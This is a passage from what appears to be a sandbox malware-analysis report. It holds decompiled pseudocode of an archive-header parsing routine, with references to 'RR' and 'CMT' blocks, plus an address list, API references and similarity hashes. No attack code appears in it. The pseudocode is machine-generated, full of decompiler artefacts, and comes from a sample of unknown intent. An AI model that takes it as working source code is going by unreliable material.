										 *(_t523 + 0x6cbb) = _t552 >> 0x00000006 & 0x00000001;
										 *(_t523 + 0x6cbc) = _t552 >> 0x00000007 & 0x00000001;
										__eflags = _t647;
										if(_t647 != 0) {
											L119:
											_t357 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t523 + 0x6cb8)) = _t357;
											 *(_t523 + 0x2224) = _t552 >> 0x00000001 & 0x00000001;
											_t554 = _t552 >> 0x00000004 & 0x00000001;
											__eflags = _t554;
											 *(_t523 + 0x6cb9) = _t552 >> 0x00000008 & 0x00000001;
											 *(_t523 + 0x6cba) = _t554;
											L121:
											_t664 = 7;
											L122:
											_t364 = E0100C691(_t710 + 0x24, 0);
											__eflags =  *(_t523 + 0x21e4) - (_t364 & 0x0000ffff);
											if( *(_t523 + 0x21e4) == (_t364 & 0x0000ffff)) {
												L132:
												 *((intOrPtr*)(_t710 + 0x1c)) =  *((intOrPtr*)(_t710 + 0x3c));
												goto L133;
											}
											_t369 =  *(_t523 + 0x21e8);
											__eflags = _t369 - 0x79;
											if(_t369 == 0x79) {
												goto L132;
											}
											__eflags = _t369 - 0x76;
											if(_t369 == 0x76) {
												goto L132;
											}
											__eflags = _t369 - 5;
											if(_t369 != 5) {
												L130:
												 *((char*)(_t523 + 0x6cc4)) = 1;
												E01006FC6(0x1040f50, 3);
												__eflags =  *((char*)(_t710 + 0x5f));
												if(__eflags == 0) {
													goto L132;
												}
												E01001F94(__eflags, 4, _t523 + 0x24, _t523 + 0x24);
												 *((char*)(_t523 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t523 + 0x45ae);
											if( *(_t523 + 0x45ae) == 0) {
												goto L130;
											}
											 *0x1033260();
											_t376 =  *((intOrPtr*)( *((intOrPtr*)( *_t523 + 0x14))))() - _t664;
											__eflags = _t376;
											asm("sbb edx, ecx");
											 *0x1033260(_t376, _t647, 0);
											 *((intOrPtr*)( *_t523 + 0x10))();
											 *(_t710 + 0x5e) = 1;
											do {
												_t379 = E0100995D(_t523);
												asm("sbb al, al");
												_t382 =  !( ~_t379) &  *(_t710 + 0x5e);
												 *(_t710 + 0x5e) = _t382;
												_t664 = _t664 - 1;
												__eflags = _t664;
											} while (_t664 != 0);
											__eflags = _t382;
											if(_t382 != 0) {
												goto L132;
											}
											goto L130;
										}
										_t357 = 0;
										__eflags =  *(_t523 + 0x221c);
										if( *(_t523 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t523 + 0x21ec) & 0x00008000;
										if(( *(_t523 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t523 + 0x6ca8)) =  *((intOrPtr*)(_t523 + 0x6ca8)) + E0100C5E0(_t710 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t541 - 3;
									if(_t541 <= 3) {
										__eflags = _t541 - 2;
										_t64 = (0 | _t541 != 0x00000002) - 1; // -1
										_t672 = (_t64 & 0xffffdcb0) + 0x45d0 + _t523;
										 *(_t710 + 0x48) = _t672;
										E0100AC32(_t672, 0);
										_t567 = 5;
										memcpy(_t672, _t523 + 0x21e4, _t567 << 2);
										_t695 =  *(_t710 + 0x48);
										_t675 =  *(_t710 + 0x50);
										_t569 =  *(_t695 + 8);
										 *(_t695 + 0x1098) =  *(_t695 + 8) & 1;
										 *(_t695 + 0x1099) = _t569 >> 0x00000001 & 1;
										 *(_t695 + 0x109b) = _t569 >> 0x00000002 & 1;
										 *(_t695 + 0x10a0) = _t569 >> 0x0000000a & 1;
										__eflags = _t675 - 2;
										if(_t675 != 2) {
											L35:
											_t650 = 0;
											__eflags = 0;
											_t399 = 0;
											L36:
											 *((char*)(_t695 + 0x10f0)) = _t399;
											__eflags = _t675 - 2;
											if(_t675 == 2) {
												L39:
												_t400 = _t650;
												L40:
												 *(_t695 + 0x10fa) = _t400;
												_t570 = _t569 & 0x000000e0;
												__eflags = _t570 - 0xe0;
												 *((char*)(_t695 + 0x10f1)) = 0 | _t570 == 0x000000e0;
												__eflags = _t570 - 0xe0;
												if(_t570 != 0xe0) {
													_t651 =  *(_t695 + 8);
													_t404 = 0x10000 << (_t651 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t404 = _t650;
													_t651 =  *(_t695 + 8);
												}
												 *(_t695 + 0x10f4) = _t404;
												 *(_t695 + 0x10f3) = _t651 >> 0x0000000b & 0x00000001;
												 *(_t695 + 0x10f2) = _t651 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t695 + 0x14)) = E0100C5E0(_t710 + 0x24);
												 *(_t710 + 0x54) = E0100C5E0(_t710 + 0x24);
												 *((char*)(_t695 + 0x18)) = E0100C593(_t710 + 0x24);
												 *(_t695 + 0x1070) = 2;
												 *((intOrPtr*)(_t695 + 0x1074)) = E0100C5E0(_t710 + 0x24);
												 *(_t710 + 0x18) = E0100C5E0(_t710 + 0x24);
												 *(_t695 + 0x1c) = E0100C593(_t710 + 0x24) & 0x000000ff;
												 *((char*)(_t695 + 0x20)) = E0100C593(_t710 + 0x24) - 0x30;
												 *(_t710 + 0x4c) = E0100C5AB(_t710 + 0x24) & 0x0000ffff;
												_t418 = E0100C5E0(_t710 + 0x24);
												_t654 =  *(_t695 + 0x1c);
												 *(_t710 + 0x58) = _t418;
												 *(_t695 + 0x24) = _t418;
												__eflags = _t654 - 0x14;
												if(_t654 < 0x14) {
													__eflags = _t418 & 0x00000010;
													if((_t418 & 0x00000010) != 0) {
														 *((char*)(_t695 + 0x10f1)) = 1;
													}
												}
												 *(_t695 + 0x109c) = 0;
												__eflags =  *(_t695 + 0x109b);
												if( *(_t695 + 0x109b) == 0) {
													L55:
													_t419 =  *((intOrPtr*)(_t695 + 0x18));
													 *(_t695 + 0x10fc) = 2;
													__eflags = _t419 - 3;
													if(_t419 == 3) {
														L59:
														 *(_t695 + 0x10fc) = 1;
														L60:
														 *(_t695 + 0x1100) = 0;
														__eflags = _t419 - 3;
														if(_t419 == 3) {
															__eflags = ( *(_t710 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t710 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t695 + 0x1100) = 1;
																 *((short*)(_t695 + 0x1104)) = 0;
															}
														}
														__eflags = _t675 - 2;
														if(_t675 == 2) {
															L66:
															_t420 = 0;
															goto L67;
														} else {
															__eflags =  *(_t695 + 0x24);
															if( *(_t695 + 0x24) >= 0) {
																goto L66;
															}
															_t420 = 1;
															L67:
															 *((char*)(_t695 + 0x10f8)) = _t420;
															_t423 =  *(_t695 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t423;
															 *(_t695 + 0x10f9) = _t423;
															if(_t423 == 0) {
																__eflags =  *(_t710 + 0x54) - 0xffffffff;
																_t647 = 0;
																_t676 = 0;
																_t137 =  *(_t710 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t424 = _t423 & 0xffffff00 | _t137;
																L73:
																 *(_t695 + 0x109a) = _t424;
																 *((intOrPtr*)(_t695 + 0x1058)) = 0 +  *((intOrPtr*)(_t695 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t695 + 0x105c)) = _t676;
																asm("adc edx, ecx");
																 *(_t695 + 0x1060) = 0 +  *(_t710 + 0x54);
																__eflags =  *(_t695 + 0x109a);
																 *(_t695 + 0x1064) = _t647;
																if( *(_t695 + 0x109a) != 0) {
																	 *(_t695 + 0x1060) = 0x7fffffff;
																	 *(_t695 + 0x1064) = 0x7fffffff;
																}
																_t429 =  *(_t710 + 0x4c);
																_t677 = 0x1fff;
																 *(_t710 + 0x54) = 0x1fff;
																__eflags = _t429 - 0x1fff;
																if(_t429 < 0x1fff) {
																	_t677 = _t429;
																	 *(_t710 + 0x54) = _t429;
																}
																E0100C642(_t710 + 0x24, _t710 - 0x2030, _t677);
																_t432 = 0;
																__eflags =  *(_t710 + 0x50) - 2;
																 *((char*)(_t710 + _t677 - 0x2030)) = 0;
																if( *(_t710 + 0x50) != 2) {
																	 *(_t710 + 0x50) = _t695 + 0x28;
																	_t435 = E0101137A(_t710 - 0x2030, _t695 + 0x28, 0x800);
																	_t680 =  *((intOrPtr*)(_t695 + 0xc)) -  *(_t710 + 0x4c) - 0x20;
																	__eflags =  *(_t695 + 8) & 0x00000400;
																	if(( *(_t695 + 8) & 0x00000400) != 0) {
																		_t680 = _t680 - 8;
																		__eflags = _t680;
																	}
																	__eflags = _t680;
																	if(_t680 <= 0) {
																		_t681 = _t695 + 0x28;
																	} else {
																		 *(_t710 + 0x58) = _t695 + 0x1028;
																		E01002034(_t695 + 0x1028, _t680);
																		_t469 = E0100C642(_t710 + 0x24,  *(_t695 + 0x1028), _t680);
																		_t681 = _t695 + 0x28;
																		_t435 = E010235E9(_t469, _t695 + 0x28, L"RR");
																		__eflags = _t435;
																		if(_t435 == 0) {
																			__eflags =  *((intOrPtr*)(_t695 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t695 + 0x102c)) >= 0x14) {
																				_t682 =  *( *(_t710 + 0x58));
																				asm("cdq");
																				_t609 =  *(_t682 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t611 = (_t609 << 8) + ( *(_t682 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t613 = (_t611 << 8) + ( *(_t682 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t475 = (_t613 << 8) + ( *(_t682 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t523 + 0x21c0) = _t475 << 9;
																				 *(_t523 + 0x21c4) = ((((_t647 << 0x00000020 | _t609) << 0x8 << 0x00000020 | _t611) << 0x8 << 0x00000020 | _t613) << 0x8 << 0x00000020 | _t475) << 9;
																				 *0x1033260();
																				_t480 = E0100FAEC( *(_t523 + 0x21c0),  *(_t523 + 0x21c4),  *((intOrPtr*)( *((intOrPtr*)( *_t523 + 0x14))))(), _t647);
																				 *(_t523 + 0x21c8) = _t480;
																				 *(_t710 + 0x58) = _t480;
																				_t481 = E0101E2B0(_t479, _t647, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t435 = E0100FAEC(_t481 +  *(_t523 + 0x21c0), _t647, _t479, _t647);
																				_t620 =  *(_t710 + 0x58);
																				_t695 =  *(_t710 + 0x48);
																				_t681 =  *(_t710 + 0x50);
																				__eflags = _t435 - _t620;
																				if(_t435 > _t620) {
																					_t435 = _t620 + 1;
																					 *(_t523 + 0x21c8) = _t620 + 1;
																				}
																			}
																		}
																	}
																	_t436 = E010235E9(_t435, _t681, L"CMT");
																	__eflags = _t436;
																	if(_t436 == 0) {
																		 *((char*)(_t523 + 0x6cb6)) = 1;
																	}
																} else {
																	_t681 = _t695 + 0x28;
																	 *_t681 = 0;
																	__eflags =  *(_t695 + 8) & 0x00000200;
																	if(( *(_t695 + 8) & 0x00000200) != 0) {
																		E01006BAC(_t710);
																		_t488 = E01023630(_t710 - 0x2030);
																		_t647 =  *(_t710 + 0x54);
																		_t489 = _t488 + 1;
																		__eflags = _t647 - _t489;
																		if(_t647 > _t489) {
																			__eflags = _t489 + _t710 - 0x2030;
																			E01006BBD(_t710, _t710 - 0x2030, _t647, _t489 + _t710 - 0x2030, _t647 - _t489, _t681, 0x800);
																		}
																		_t432 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t681 - _t432;
																	if( *_t681 == _t432) {
																		_push(1);
																		_push(0x800);
																		_push(_t681);
																		_push(_t710 - 0x2030);
																		E0100FB42();
																	}
																	E01002093(_t523, _t695);
																}
																__eflags =  *(_t695 + 8) & 0x00000400;
																if(( *(_t695 + 8) & 0x00000400) != 0) {
																	E0100C642(_t710 + 0x24, _t695 + 0x10a1, 8);
																}
																E01010C60( *(_t710 + 0x18));
																__eflags =  *(_t695 + 8) & 0x00001000;
																if(( *(_t695 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t523 + 0x6ca8)) = E01003E70( *((intOrPtr*)(_t523 + 0x6ca8)),  *(_t523 + 0x6cac),  *((intOrPtr*)(_t695 + 0x1058)),  *((intOrPtr*)(_t695 + 0x105c)), 0, 0);
																	 *(_t523 + 0x6cac) = _t647;
																	 *((char*)(_t710 + 0x20)) =  *(_t695 + 0x10f2);
																	_t441 = E0100C691(_t710 + 0x24,  *((intOrPtr*)(_t710 + 0x20)));
																	__eflags =  *_t695 - (_t441 & 0x0000ffff);
																	if( *_t695 != (_t441 & 0x0000ffff)) {
																		 *((char*)(_t523 + 0x6cc4)) = 1;
																		E01006FC6(0x1040f50, 1);
																		__eflags =  *((char*)(_t710 + 0x5f));
																		if(__eflags == 0) {
																			E01001F94(__eflags, 0x1c, _t523 + 0x24, _t681);
																		}
																	}
																	goto L121;
																} else {
																	_t446 = E0100C5AB(_t710 + 0x24);
																	 *((intOrPtr*)(_t710 + 4)) = _t523 + 0x32c0;
																	 *((intOrPtr*)(_t710 + 8)) = _t523 + 0x32c8;
																	 *((intOrPtr*)(_t710 + 0xc)) = _t523 + 0x32d0;
																	__eflags = 0;
																	_t696 = 0;
																	 *((intOrPtr*)(_t710 + 0x10)) = 0;
																	_t451 = _t446 & 0x0000ffff;
																	 *(_t710 + 0x4c) = 0;
																	 *(_t710 + 0x58) = _t451;
																	do {
																		_t593 = 3;
																		_t526 = _t451 >> _t593 - _t696 << 2;
																		__eflags = _t526 & 0x00000008;
																		if((_t526 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t710 + 4 + _t696 * 4);
																		if( *(_t710 + 4 + _t696 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t696;
																		if(__eflags != 0) {
																			E01010C60(E0100C5E0(_t710 + 0x24));
																		}
																		E01010A8A( *(_t710 + 4 + _t696 * 4), _t647, __eflags, _t710 - 0x30);
																		__eflags = _t526 & 0x00000004;
																		if((_t526 & 0x00000004) != 0) {
																			_t249 = _t710 - 0x1c;
																			 *_t249 =  *(_t710 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t597 = 0;
																		 *(_t710 - 0x18) = 0;
																		_t527 = _t526 & 0x00000003;
																		__eflags = _t527;
																		if(_t527 <= 0) {
																			L109:
																			_t454 = _t597 * 0x64;
																			__eflags = _t454;
																			 *(_t710 - 0x18) = _t454;
																			E01010CBE( *(_t710 + 4 + _t696 * 4), _t647, _t710 - 0x30);
																			_t451 =  *(_t710 + 0x58);
																		} else {
																			_t457 = 3;
																			_t459 = _t457 - _t527 << 3;
																			__eflags = _t459;
																			 *(_t710 + 0x18) = _t459;
																			_t697 = _t459;
																			do {
																				_t462 = (E0100C593(_t710 + 0x24) & 0x000000ff) << _t697;
																				_t697 = _t697 + 8;
																				_t597 =  *(_t710 - 0x18) | _t462;
																				 *(_t710 - 0x18) = _t597;
																				_t527 = _t527 - 1;
																				__eflags = _t527;
																			} while (_t527 != 0);
																			_t696 =  *(_t710 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t696 = _t696 + 1;
																		 *(_t710 + 0x4c) = _t696;
																		__eflags = _t696 - 4;
																	} while (_t696 < 4);
																	_t523 =  *((intOrPtr*)(_t710 + 0x20));
																	_t695 =  *(_t710 + 0x48);
																	goto L112;
																}
															}
															_t676 = E0100C5E0(_t710 + 0x24);
															_t495 = E0100C5E0(_t710 + 0x24);
															__eflags =  *(_t710 + 0x54) - 0xffffffff;
															_t647 = _t495;
															if( *(_t710 + 0x54) != 0xffffffff) {
																L71:
																_t424 = 0;
																goto L73;
															}
															__eflags = _t647 - 0xffffffff;
															if(_t647 != 0xffffffff) {
																goto L71;
															}
															_t424 = 1;
															goto L73;
														}
													}
													__eflags = _t419 - 5;
													if(_t419 == 5) {
														goto L59;
													}
													__eflags = _t419 - 6;
													if(_t419 < 6) {
														 *(_t695 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t655 = _t654 - 0xd;
													__eflags = _t655;
													if(_t655 == 0) {
														 *(_t695 + 0x109c) = 1;
														goto L55;
													}
													_t657 = _t655;
													__eflags = _t657;
													if(_t657 == 0) {
														 *(_t695 + 0x109c) = 2;
														goto L55;
													}
													_t658 = _t657 - 5;
													__eflags = _t658;
													if(_t658 == 0) {
														L52:
														 *(_t695 + 0x109c) = 3;
														goto L55;
													}
													__eflags = _t658 == 6;
													if(_t658 == 6) {
														goto L52;
													}
													 *(_t695 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t569 & 0x00000010;
											if((_t569 & 0x00000010) == 0) {
												goto L39;
											}
											_t400 = 1;
											goto L40;
										}
										__eflags = _t569 & 0x00000010;
										if((_t569 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t399 = 1;
											_t650 = 0;
											goto L36;
										}
									}
									__eflags = _t541 - 5;
									if(_t541 != 5) {
										goto L115;
									} else {
										memcpy(_t523 + 0x4590, _t523 + 0x21e4, _t541 << 2);
										_t660 =  *(_t523 + 0x4598);
										 *(_t523 + 0x45ac) =  *(_t523 + 0x4598) & 0x00000001;
										_t636 = _t660 >> 0x00000001 & 0x00000001;
										_t647 = _t660 >> 0x00000003 & 0x00000001;
										 *(_t523 + 0x45ad) = _t636;
										 *(_t523 + 0x45ae) = _t660 >> 0x00000002 & 0x00000001;
										 *(_t523 + 0x45af) = _t647;
										__eflags = _t636;
										if(_t636 != 0) {
											 *((intOrPtr*)(_t523 + 0x45a4)) = E0100C5E0(_t710 + 0x24);
										}
										__eflags =  *(_t523 + 0x45af);
										if( *(_t523 + 0x45af) != 0) {
											_t509 = E0100C5AB(_t710 + 0x24) & 0x0000ffff;
											 *(_t523 + 0x45a8) = _t509;
											 *(_t523 + 0x6cd8) = _t509;
										}
										goto L121;
									}
								}
								__eflags =  *(_t523 + 0x21ec) & 0x00000002;
								if(( *(_t523 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E0100204E(_t523);
							L133:
							E010015A0(_t710 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t710 - 0xc));
							return  *((intOrPtr*)(_t710 + 0x1c));
						}
					}
					L8:
					E01003F74(_t523, _t647);
					goto L133;
				}
				_t647 =  *((intOrPtr*)(_t523 + 0x6cc0)) + _t664;
				asm("adc eax, ecx");
				_t719 =  *(_t523 + 0x6ca4);
				if(_t719 < 0 || _t719 <= 0 &&  *((intOrPtr*)(_t523 + 0x6ca0)) <= _t647) {
					goto L6;
				} else {
					 *((char*)(_t710 + 0x5f)) = 1;
					E01003DE0(_t523);
					 *0x1033260(_t710 + 0x14, 8);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t523 + 0xc))))() != 8) {
						goto L8;
					} else {
						_t709 = _t523 + 0x1028;
						E01006249(_t709, 0, 4,  *((intOrPtr*)(_t523 + 0x21bc)) + 0x5024, _t710 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t710 + 0x44)) = _t709;
						goto L7;
					}
				}
			}

0x010027e8
0x010027f1
0x010027fb
0x01002802
0x01002809
0x0100280c
0x01002815
0x01002818
0x0100281b
0x01002822
0x01002894
0x01002894
0x01002897
0x01002897
0x0100289b
0x010028a4
0x010028c0
0x010028c6
0x010028d5
0x010028dd
0x010028e3
0x010028ee
0x010028f9
0x010028fc
0x01002902
0x01002908
0x0100290a
0x01002918
0x01002918
0x0100291b
0x01002950
0x0100291d
0x0100291d
0x0100291d
0x01002920
0x01002944
0x01002922
0x01002922
0x01002922
0x01002925
0x01002938
0x01002927
0x01002927
0x0100292a
0x0100292c
0x0100292c
0x0100292a
0x01002925
0x01002920
0x0100295a
0x01002960
0x01002966
0x01002969
0x0100296f
0x01002972
0x0100297d
0x01002980
0x01002981
0x01002984
0x010029a4
0x010029aa
0x010029b0
0x010029b3
0x010029b9
0x010029bc
0x010029bf
0x010030e2
0x010030ea
0x010030f1
0x010030f8
0x01003105
0x01003117
0x0100311c
0x01003122
0x01003134
0x0100313a
0x01003147
0x01003154
0x01003161
0x01003167
0x01003169
0x01003176
0x01003178
0x01003178
0x01003179
0x01003179
0x01003185
0x01003195
0x01003195
0x01003198
0x0100319e
0x010031a4
0x010031a6
0x010031a7
0x010031ac
0x010031b4
0x010031ba
0x0100325e
0x01003261
0x00000000
0x01003261
0x010031c0
0x010031c6
0x010031c9
0x00000000
0x00000000
0x010031cf
0x010031d2
0x00000000
0x00000000
0x010031d8
0x010031db
0x01003230
0x01003237
0x0100323e
0x01003243
0x01003247
0x00000000
0x00000000
0x01003250
0x01003255
0x00000000
0x01003255
0x010031dd
0x010031e4
0x00000000
0x00000000
0x010031ed
0x010031fb
0x010031fb
0x010031fe
0x01003205
0x0100320d
0x01003210
0x01003214
0x01003216
0x0100321d
0x01003221
0x01003224
0x01003227
0x01003227
0x01003227
0x0100322c
0x0100322e
0x00000000
0x00000000
0x00000000
0x0100322e
0x0100316b
0x0100316d
0x01003174
0x00000000
0x00000000
0x00000000
0x01003174
0x010029c5
0x010030b8
0x010030b8
0x010030c2
0x010030d0
0x010030d6
0x010030d6
0x00000000
0x010030c2
0x010029cb
0x010029ce
0x01002a62
0x01002a6a
0x01002a79
0x01002a7d
0x01002a80
0x01002a87
0x01002a90
0x01002a92
0x01002a96
0x01002a9c
0x01002aa1
0x01002aad
0x01002aba
0x01002ac7
0x01002acd
0x01002ad0
0x01002add
0x01002add
0x01002add
0x01002adf
0x01002ae1
0x01002ae1
0x01002ae7
0x01002aea
0x01002af6
0x01002af6
0x01002af8
0x01002af8
0x01002b03
0x01002b05
0x01002b0a
0x01002b10
0x01002b16
0x01002b1f
0x01002b2f
0x01002b2f
0x01002b18
0x01002b18
0x01002b1a
0x01002b1a
0x01002b31
0x01002b47
0x01002b4d
0x01002b5b
0x01002b66
0x01002b71
0x01002b74
0x01002b86
0x01002b94
0x01002b9f
0x01002baf
0x01002bbd
0x01002bc0
0x01002bc5
0x01002bc8
0x01002bcb
0x01002bce
0x01002bd1
0x01002bd3
0x01002bd5
0x01002bd7
0x01002bd7
0x01002bd5
0x01002be0
0x01002be6
0x01002bec
0x01002c31
0x01002c31
0x01002c34
0x01002c3e
0x01002c40
0x01002c52
0x01002c52
0x01002c5c
0x01002c5c
0x01002c62
0x01002c64
0x01002c6e
0x01002c73
0x01002c75
0x01002c77
0x01002c81
0x01002c81
0x01002c73
0x01002c88
0x01002c8b
0x01002c97
0x01002c97
0x00000000
0x01002c8d
0x01002c8d
0x01002c90
0x00000000
0x00000000
0x01002c94
0x01002c99
0x01002c99
0x01002ca5
0x01002ca5
0x01002ca7
0x01002cad
0x01002cdb
0x01002cdf
0x01002ce1
0x01002ce3
0x01002ce3
0x01002ce3
0x01002ce6
0x01002ce6
0x01002cf1
0x01002cf7
0x01002cfe
0x01002d04
0x01002d06
0x01002d0c
0x01002d13
0x01002d19
0x01002d20
0x01002d26
0x01002d26
0x01002d2c
0x01002d2f
0x01002d34
0x01002d37
0x01002d39
0x01002d3b
0x01002d3d
0x01002d3d
0x01002d4b
0x01002d50
0x01002d52
0x01002d56
0x01002d5d
0x01002dde
0x01002de8
0x01002df3
0x01002df6
0x01002dfd
0x01002dff
0x01002dff
0x01002dff
0x01002e02
0x01002e04
0x01002f10
0x01002e0a
0x01002e13
0x01002e16
0x01002e25
0x01002e2f
0x01002e33
0x01002e3a
0x01002e3c
0x01002e42
0x01002e49
0x01002e52
0x01002e58
0x01002e59
0x01002e65
0x01002e69
0x01002e6f
0x01002e71
0x01002e79
0x01002e7f
0x01002e81
0x01002e8b
0x01002e8d
0x01002e98
0x01002ea0
0x01002eab
0x01002ec7
0x01002ed7
0x01002edd
0x01002ee0
0x01002eeb
0x01002ef3
0x01002ef8
0x01002efb
0x01002efe
0x01002f01
0x01002f03
0x01002f05
0x01002f08
0x01002f08
0x01002f03
0x01002e49
0x01002e3c
0x01002f19
0x01002f20
0x01002f22
0x01002f24
0x01002f24
0x01002d5f
0x01002d61
0x01002d64
0x01002d67
0x01002d6e
0x01002d73
0x01002d7f
0x01002d84
0x01002d87
0x01002d89
0x01002d8b
0x01002d9e
0x01002da8
0x01002da8
0x01002dad
0x01002dad
0x01002dad
0x01002daf
0x01002db2
0x01002db4
0x01002db6
0x01002dbb
0x01002dc2
0x01002dc3
0x01002dc3
0x01002dcb
0x01002dcb
0x01002f2b
0x01002f32
0x01002f40
0x01002f40
0x01002f4e
0x01002f53
0x01002f5a
0x0100303e
0x0100305f
0x01003068
0x01003074
0x0100307a
0x01003082
0x01003084
0x01003091
0x01003098
0x0100309d
0x010030a1
0x010030ae
0x010030ae
0x010030a1
0x00000000
0x01002f60
0x01002f63
0x01002f71
0x01002f7a
0x01002f83
0x01002f86
0x01002f88
0x01002f8a
0x01002f8d
0x01002f8f
0x01002f92
0x01002f95
0x01002f97
0x01002f9f
0x01002fa1
0x01002fa4
0x00000000
0x00000000
0x01002faa
0x01002faf
0x00000000
0x00000000
0x01002fb1
0x01002fb3
0x01002fc2
0x01002fc2
0x01002fcf
0x01002fd4
0x01002fd7
0x01002fd9
0x01002fd9
0x01002fd9
0x01002fd9
0x01002fdc
0x01002fde
0x01002fe1
0x01002fe1
0x01002fe4
0x01003015
0x01003015
0x01003015
0x0100301c
0x01003023
0x01003028
0x01002fe6
0x01002fe8
0x01002feb
0x01002feb
0x01002fee
0x01002ff1
0x01002ff3
0x01003000
0x01003002
0x01003008
0x0100300a
0x0100300d
0x0100300d
0x0100300d
0x01003012
0x00000000
0x01003012
0x0100302b
0x0100302b
0x0100302c
0x0100302f
0x0100302f
0x01003038
0x0100303b
0x00000000
0x0100303b
0x01002f5a
0x01002cba
0x01002cbc
0x01002cc1
0x01002cc5
0x01002cc7
0x01002cd5
0x01002cd7
0x00000000
0x01002cd7
0x01002cc9
0x01002ccc
0x00000000
0x00000000
0x01002cd0
0x00000000
0x01002cd1
0x01002c8b
0x01002c42
0x01002c44
0x00000000
0x00000000
0x01002c46
0x01002c48
0x01002c4a
0x01002c4a
0x00000000
0x01002bee
0x01002bee
0x01002bee
0x01002bf1
0x01002c27
0x00000000
0x01002c27
0x01002bf4
0x01002bf4
0x01002bf7
0x01002c1b
0x00000000
0x01002c1b
0x01002bf9
0x01002bf9
0x01002bfc
0x01002c0f
0x01002c0f
0x00000000
0x01002c0f
0x01002bfe
0x01002c01
0x00000000
0x00000000
0x01002c03
0x00000000
0x01002c03
0x01002bec
0x01002aec
0x01002aef
0x00000000
0x00000000
0x01002af3
0x00000000
0x01002af3
0x01002ad2
0x01002ad5
0x00000000
0x01002ad7
0x01002ad7
0x01002ad9
0x00000000
0x01002ad9
0x01002ad5
0x010029d4
0x010029d7
0x00000000
0x010029dd
0x010029e9
0x010029f1
0x010029f9
0x01002a08
0x01002a10
0x01002a13
0x01002a19
0x01002a1f
0x01002a25
0x01002a27
0x01002a31
0x01002a31
0x01002a37
0x01002a3e
0x01002a4c
0x01002a4f
0x01002a55
0x01002a55
0x00000000
0x01002a3e
0x010029d7
0x01002974
0x0100297b
0x00000000
0x00000000
0x00000000
0x0100297b
0x0100296b
0x0100296b
0x00000000
0x0100290c
0x0100290e
0x01003264
0x01003267
0x01003275
0x01003280
0x01003280
0x0100290a
0x010028a6
0x010028a8
0x00000000
0x010028a8
0x0100282c
0x0100282e
0x01002830
0x01002836
0x00000000
0x01002842
0x01002844
0x01002848
0x0100285a
0x01002867
0x00000000
0x01002869
0x01002879
0x0100288a
0x0100288f
0x00000000
0x0100288f
0x01002867

APIs

__EH_prolog.LIBCMT ref: 010027F1
_strlen.LIBCMT ref: 01002D7F

Part of subcall function 0101137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100B652,00000000,?,?,?,000C0084), ref: 01011396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01002EE0

Strings

CMT, xrefs: 01002F13

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 860a570b2e660f1e909d3835e8d3041b889ae59bf9945223d35ea40006fc2042
Instruction ID: 5f9e275d8085dad73437f347a95b2314d1cec61cf44370e5d8c9a8a4e27cd80a
Opcode Fuzzy Hash: 860a570b2e660f1e909d3835e8d3041b889ae59bf9945223d35ea40006fc2042
Instruction Fuzzy Hash: 3A62F4715006458FEF1ADF68C8886EA3BE1AF64300F0945BDEDDA8B2C2DB759985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0102866F, Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E0102866F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
